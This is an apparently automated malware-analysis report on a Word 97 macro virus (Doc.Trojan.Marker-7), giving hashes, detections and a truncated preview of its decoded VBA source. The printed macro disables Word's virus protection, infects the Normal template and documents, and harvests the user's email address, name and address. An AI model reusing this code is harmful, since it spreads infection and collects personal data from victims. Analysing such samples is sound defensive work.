Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 554f735ff48899f8…

MALICIOUS

Office (OLE)

43.0 KB Created: 1997-09-17 11:18:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: b44d0e44c7b31b2fade8fa5582037c19 SHA-1: f8736c499753150a2e35af055aa07c24f131e70d SHA-256: 554f735ff48899f8fc7a7b5967fe74dce40847be731e51171b960bb1c4478658
140 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is identified as malicious by ClamAV with the signature Doc.Trojan.Marker-7. It contains VBA macros, which are a common vector for malware. The macro code appears to be obfuscated and attempts to write to a file path 'C:\Scan8328.sys', suggesting it may be part of a downloader or dropper mechanism. The macro's intent is to execute further malicious actions, likely involving the file it writes.

Heuristics 2

  • ClamAV: Doc.Trojan.Marker-7 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Marker-7
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 22228 bytes
SHA-256: 0626ea45d5d335c91c60f18ab7293c50718d84e72d9bc48a2341d96f9ba2367e
Detection
ClamAV: Doc.Trojan.Marker-7
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()

On Error Resume Next

Const Marcador = "<->"

'Declarar Variables
Dim SalvarDocumento, SalvarPlantillaNormal, DocumentoInfectado, PlantillaNormalInfectada As Boolean
Dim ad, nt, ad2 As Object
Dim OurCode, UserAddress, LogData, LogFile As String
Dim CorreoPredeterminado, Email, DatosFichero, ExisteFichero As String


'Inicializar Variables
Set ad = ActiveDocument.VBProject.VBComponents.Item(1)
Set nt = NormalTemplate.VBProject.VBComponents.Item(1)

'Para que no se vea nada
Application.ScreenUpdating = False


DocumentoInfectado = ad.codemodule.Find(Marcador, 1, 1, 10000, 10000)
PlantillaNormalInfectada = nt.codemodule.Find(Marcador, 1, 1, 10000, 10000)


'Switch the VirusProtection OFF
Options.VirusProtection = False

If (System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "LogFile") <> "kk") Then

    If DocumentoInfectado = True Then
      LogData = ad.codemodule.Lines(1, ad.codemodule.CountOfLines)
    ElseIf PlantillaNormalInfectada = True Then
      LogData = nt.codemodule.Lines(1, nt.codemodule.CountOfLines)
    End If

    LogData = Mid(LogData, InStr(1, LogData, "'Ordenadores " & "Infectados -->") + 29, Len(LogData) - InStr(1, LogData, "'Ordenadores " & "Infectados -->") + 29)

    LogFile = "C:\Scan8328" & ".sys"
    DatosFichero = ""
    For i = 1 To Len(LogData)
        If Mid(LogData, i, 1) <> "'" Then
            DatosFichero = DatosFichero & Mid(LogData, i, 1)
        End If
    Next
    
    Open LogFile For Output As #1
    Print #1, DatosFichero
    Close #1

    System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "LogFile") = "kk"

End If

'Por Seguridad
If (DocumentoInfectado = True Xor PlantillaNormalInfectada = True) And _
   (ActiveDocument.SaveFormat = wdFormatDocument Or _
   ActiveDocument.SaveFormat = wdFormatTemplate) Then
   
   
   'Infectar la Plantilla Normal
   If DocumentoInfectado = True Then
  
     SalvarPlantillaNormal = NormalTemplate.Saved
  
     OurCode = ad.codemodule.Lines(1, ad.codemodule.CountOfLines)

    
     'Escribir los datos de la nueva Infección

     CorreoPredeterminado = System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager", "Default Mail Account")
     Email = System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\" & CorreoPredeterminado, "SMTP Email Address")
     
     For i = 1 To Len(Application.UserAddress)
       If Mid(Application.UserAddress, i, 1) <> Chr(13) Then
         If Mid(Application.UserAddress, i, 1) <> Chr(10) Then
           UserAddress = UserAddress & Mid(Application.UserAddress, i, 1)
         End If
       End If
     Next i
     
     
     
     OurCode = OurCode & Chr(13) & _
              "'" & "Hello From;" & Email & ";" & _
              Format(Time, "hh:mm:ss AMPM - ") & _
              Format(Date, "dddd, d mmm yyyy") & ";" & _
              Application.UserName & " | " & UserAddress




     nt.codemodule.DeleteLines 1, nt.codemodule.CountOfLines
     nt.codemodule.AddFromString OurCode
   
     'If SalvarPlantillaNormal = True Then
     '   NormalTemplate.Save
     'End If
     
     If NormalTemplate.Saved = False Then
        NormalTemplate.Save
        PlantillaNormalInfectada = False
     End If
  End If

  'Infectar el documento activo
  If PlantillaNormalInfectada = True And _
     (Mid(ActiveDocument.FullName, 2, 1) = ":" Or _
     ActiveDocument.Saved = False) Then
  
     If ActiveDocument.MailMerge.DataSource.Name <> "C:\scan8328.sys" Then
       SalvarDocumento = ActiveDocument.Saved
    
       OurCode = nt.codemodule.Lines(1, nt.codemodule.CountOfLines)
   
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.